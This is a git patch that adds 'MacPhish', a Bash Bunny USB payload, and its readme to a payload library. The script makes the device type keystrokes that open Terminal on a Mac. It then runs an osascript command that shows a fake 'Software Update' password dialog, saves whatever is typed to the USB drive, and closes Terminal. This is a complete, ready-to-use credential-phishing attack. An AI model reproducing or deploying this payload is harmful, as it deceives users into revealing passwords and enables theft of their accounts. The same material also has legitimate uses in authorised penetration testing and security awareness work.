From ca9e466ce7601774193cbeb449c09e1dba4acf56 Mon Sep 17 00:00:00 2001
From: Dan Borges <ahhh.db@gmail.com>
Date: Fri, 7 Apr 2017 00:23:49 -0700
Subject: [PATCH] Added MacPhish payload (#70)

* Adding the MacPhish payload, uses HID and STORAGE modes on BashBunny. For OS X, uses spotlight to launch terminal, then uses osascript command to phish for the users password, then saves the phished password back to the bashbunny.

* Update readme.md
---
 payloads/library/MacPhish/payload.txt | 49 +++++++++++++++++++++++++++
 payloads/library/MacPhish/readme.md   | 21 ++++++++++++
 2 files changed, 70 insertions(+)
 create mode 100644 payloads/library/MacPhish/payload.txt
 create mode 100644 payloads/library/MacPhish/readme.md

diff --git a/payloads/library/MacPhish/payload.txt b/payloads/library/MacPhish/payload.txt
new file mode 100644
index 00000000..716ae39e
--- /dev/null
+++ b/payloads/library/MacPhish/payload.txt
@@ -0,0 +1,49 @@
+#!/bin/bash
+#
+# Title:         Mac Password Phisher
+# Author:        Ahhh
+# Version:       1.0
+#
+# Prompts for user password, writes response to the bunny 
+#
+# Blue...............Starting
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED B
+
+LANGUAGE='us'
+lootdir=loot/MacLoot
+
+# Gimme a Keyboard please. Thanks.
+ATTACKMODE HID STORAGE
+LED R G
+
+mkdir -p /root/udisk/$lootdir
+
+# Get a terminal
+QUACK DELAY 400
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING terminal
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 400
+
+# Make lootdir
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/phish
+QUACK ENTER
+QUACK DELAY 200
+QUACK ENTER
+
+# Execute Payload
+QUACK STRING osascript -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" \& return \& return  default answer \"\" with icon 1 with hidden answer with title \"Software Update\"\'\>/Volumes/BashBunny/$lootdir/phish/pw.txt\; sleep 20\; killall Terminal\;
+QUACK ENTER
+QUACK DELAY 1000
+
+# Sync filesystem
+sync
+
+# Green is the official Light of "finished"
+LED G
\ No newline at end of file
diff --git a/payloads/library/MacPhish/readme.md b/payloads/library/MacPhish/readme.md
new file mode 100644
index 00000000..df6eda03
--- /dev/null
+++ b/payloads/library/MacPhish/readme.md
@@ -0,0 +1,21 @@
+# Mac Phish
+
+Author: ahhh
+Version: Version 1.0
+
+## Description
+
+Credz to Fuzzynop for introducing me to the technique: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+Using ducky script, it opens a terminal and uses the osascript command in an attempt to social engineer the root password, then saves this back to bash bunny in the loot dir
+
+## Configuration
+
+This is configured for Macbooks as a keyboard, opens terminal via spotlight 
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Blue             | Setup                                 |
+| Amber            | Running the scripts                   |
+| Green            | Finished                              |